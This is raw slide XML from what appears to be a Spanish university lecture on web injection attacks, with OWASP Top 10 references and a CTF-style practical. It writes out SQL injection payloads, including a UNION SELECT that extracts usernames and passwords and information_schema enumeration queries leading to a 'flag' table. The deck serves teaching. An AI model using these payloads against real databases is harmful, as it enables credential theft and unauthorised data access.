            <a:ext cx="1310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Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SELECT id, producto, stock FROM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>inventario’ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, usuario, contraseñas FROM usuarios -- - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" panose="02070603080606020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>‘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7E7DCA6E-E831-46B7-FFC5-51220D054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97807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2209800" y="433918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446416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10761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32101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9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play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2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xbox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Nacho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7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Bona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8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08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D5E66FD1-82FE-B230-3DAA-D6E4ACCD42DC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Enumeración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0DAFD2-C84E-81B2-898E-01DC6237B0FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="2055292"/>
            <a:ext cx="12078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Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>UNION SELECT 1,2,3,4,schema_name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Book Antiqua" panose="0204060205030503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8CFF21-B4AE-3F2A-3985-4AD1E958B290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="1586490"/>
            <a:ext cx="349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 Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nombres de bases de datos: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63F359-8837-2532-AA5E-CED9ACE12820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="3300384"/>
            <a:ext cx="9052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UNION SELECT 1,2,3,4,table_name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urjcdb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0A1E63-ADBA-4464-ACB3-E3D96DC536B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="2662449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 Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nombres de tabla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A30D774-1C9B-C1E6-B385-15B68E973204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="5144381"/>
            <a:ext cx="10028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UNION SELECT 1,2,3,4,column_name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=...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6C0A764-7A93-F554-12E0-7BE13A8771CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477258" y="434549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 Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nombres de columnas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1245917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30C6-7988-B41B-76DD-1E5CDF9A1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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F18BF6-6734-47C8-5400-E322E88356B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="0"/>
            <a:ext cx="9944100" cy="1040670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CB0016"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="481965" rIns="0" bIns="0" rtlCol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789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3600" spc="-20" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Enumeración: Nota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5C26D7A-0EC1-43CC-4F8F-877B4519711A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366886" y="2318993"/>
            <a:ext cx="874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latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tabla: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5400" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="5400" dirty="0">
              <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Columna: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>flag_value</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="5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67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5,000 MIL COPAS en CLASH ROYALE !! - Fernanfloo - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFF3E0D-ACB1-879A-B105-192B0994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635" y="-1353925"/>
            <a:ext cx="12754464" cy="956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6A2D01-4AE0-2EAD-D649-234C37B7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4466" y="4200426"/>
            <a:ext cx="5827395" cy="492443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  <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Práctica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12352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9550" y="1333436"/>
            <a:ext cx="11010900" cy="5525135"/>
            <a:chOff x="209550" y="1333436"/>
            <a:chExt cx="11010900" cy="5525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0425" y="1333436"/>
              <a:ext cx="5386451" cy="5524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100" y="1352549"/>
              <a:ext cx="5257799" cy="55054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" y="5610225"/>
              <a:ext cx="3295649" cy="124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1550" y="5648324"/>
              <a:ext cx="10248900" cy="47625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10248900" h="47625">
                  <a:moveTo>
                    <a:pt x="102489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0248900" y="47625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10248900" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CB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9FBE-978D-C154-2C5A-FA2D6AE6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5F7873-3E9C-641E-16A9-72312E97A1BC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E91D07C-C518-B8EE-EFF8-BECEC4C4C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Inyecciones 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E362369-DE3F-6796-A4D4-E77F3F7B03BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1719326"/>
            <a:ext cx="8631978" cy="4634602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Características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Es un tipo de ataque web</a:t>
            </a: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10" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Se aprovechan de código ya existente con el fin de añadir el suyo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="527050" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1789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r>
              <a:rPr lang="es-ES" spc="-20" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Existen muchos tipos, uno por cada lenguaje</a:t>
            </a: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5438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0DF5-04EF-E1B6-C707-5765829E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71B51-CA88-AE33-7DA8-43E60AF0976D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9117F23-3E2D-B605-41CC-802D60C68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Inyecciones II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CCB54D6-17CB-A991-2A43-83F8A40EF771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1719326"/>
            <a:ext cx="8631978" cy="220316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Ejemplo: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87FD0E9-E191-DA5B-B8F9-01678A0B023C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406524" y="5656324"/>
            <a:ext cx="1191895" cy="62068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Larry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer tower with a cloud&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AA56E37-7DD0-385A-0450-49A8FE3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20" y="3428999"/>
            <a:ext cx="1319544" cy="2137834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B169290F-B605-36BB-A2FC-01DD30E1FFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9312274" y="5656323"/>
            <a:ext cx="1191895" cy="62068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urjc.es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42AF8C-EB3F-5C83-6DF3-24863FA0BA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206750" y="3905251"/>
            <a:ext cx="5429249" cy="21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4F1DF8-99EC-5E1D-DC15-D28AAED7E778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206749" y="5080000"/>
            <a:ext cx="5429249" cy="21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10AA9F-A132-EFBB-04E2-C4454ED7D6F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3206749" y="4466167"/>
            <a:ext cx="5429250" cy="1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artoon skeleton holding a bomb&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B079332-4EEA-194F-35B8-5E979C1A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3047999"/>
            <a:ext cx="1792393" cy="2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1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AF5C5-4BB4-061B-9B0F-DCFE0FA1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B3C129-0985-0A66-189D-68BC799D728C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AB24A4E-A233-7088-9651-D926E1C9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Inyecciones II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5605A35-1EE7-1243-17C6-75FAC7675DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1719326"/>
            <a:ext cx="8631978" cy="220316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Ejemplo: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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer tower with a cloud&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8843927-62DF-8A35-3005-35A0F9A4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20" y="3428999"/>
            <a:ext cx="1319544" cy="2137834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B4E3699-C610-88AD-2A45-274B2EC3163C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9312274" y="5656323"/>
            <a:ext cx="1191895" cy="62068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urjc.es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F58EEC-6A07-73BE-7CDC-4BE59A5DB89E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206750" y="3905251"/>
            <a:ext cx="5429249" cy="21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88D804-0926-2016-6E2B-FAE8829805CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206749" y="5080000"/>
            <a:ext cx="5429249" cy="21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E74B80-361F-2D37-49E7-BCC7345CD629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3206749" y="4466167"/>
            <a:ext cx="5429250" cy="1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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B54324-2FCF-A34B-6885-02A48834B205}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4041774" y="3211573"/>
            <a:ext cx="3255645" cy="62068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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Código malicioso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="A cartoon skeleton holding a bomb&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F07A54E-D4F8-DFE4-DEA4-D609F7EE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3047999"/>
            <a:ext cx="1792393" cy="2518834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A wooden barrel with red balloons&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26D9EEE-F6AC-557A-ED29-4A2BE7DE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76" y="3058582"/>
            <a:ext cx="866048" cy="1217085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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62BFBEE7-95CE-BB0E-BD7E-0775AC41C12A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406524" y="5656324"/>
            <a:ext cx="1191895" cy="62068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latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Larry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="A grey top hat on a black background&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CEBFE8-C82C-0BFF-F7D8-793F08E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" flipH="1">
            <a:off x="1240378" y="2688166"/>
            <a:ext cx="1519743" cy="836084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A pair of sunglasses on a black background&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD59094-F9AD-B74F-66C0-CE274712B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80000">
            <a:off x="1259829" y="3416413"/>
            <a:ext cx="952502" cy="4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861F-78DD-D687-D344-8426137E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DD743D-3FCF-C6F5-23AA-A675B7EF0829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37A333B-0FC9-1346-C334-BAE4E3ED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Inyecciones II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3EC73BC-45B4-3F9D-B751-61979373B08A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1719326"/>
            <a:ext cx="8631978" cy="2203167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Ejemplo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="527050" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1870"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="es-ES" spc="-25" dirty="0">
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="1795"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="es-ES" spc="-10">
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A computer tower with a cloud&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFCD366-EAA4-E360-75A2-16C2A439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03" y="2825749"/>
            <a:ext cx="2166210" cy="3450167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6F3C34C2-135F-0EE4-A1B4-D6A274B2FB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5090338" y="2342925"/>
            <a:ext cx="5753311" cy="3749744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tx1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Tablas de instrucciones del servidor</a:t>
            </a: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Instrucción 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> Código benigno</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill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Instrucción 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Código benigno</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill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accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Instrucción 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Código malicioso</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:ea typeface="Batang"/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accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
              </a:rPr>
              <a:t>Instrucción 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
              </a:rPr>
              <a:t>Código benigno</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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z="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
              </a:rPr>
              <a:t>Instrucción 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
              </a:rPr>
              <a:t>Código benigno</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:schemeClr val="accent3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8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CFD1-1828-D6FD-F928-66A78638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ED0075-8B81-A581-2D47-D80BA0606A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576916" y="0"/>
            <a:ext cx="10064750" cy="1047750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CB0016"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="CB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F305A79-8802-27F7-82A1-8E31CE30E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4523" y="-4292"/>
            <a:ext cx="3825517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/>
          <a:p>
            <a:pPr marL="12700">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Inyecciones III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EDA4DB5-A26C-A881-7581-11EE68097D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475691" y="1698159"/>
            <a:ext cx="3245062" cy="743793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="248920" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:defRPr sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F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960"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Mapping">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFD548E-0267-724E-18D9-F42231CD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877609"/>
            <a:ext cx="10164233" cy="27961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BA7C8-D529-6F42-B91B-64EADF910FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962938" y="3595053"/>
            <a:ext cx="1560818" cy="215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CA037-96C9-34FC-1D8B-198C3C351E4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
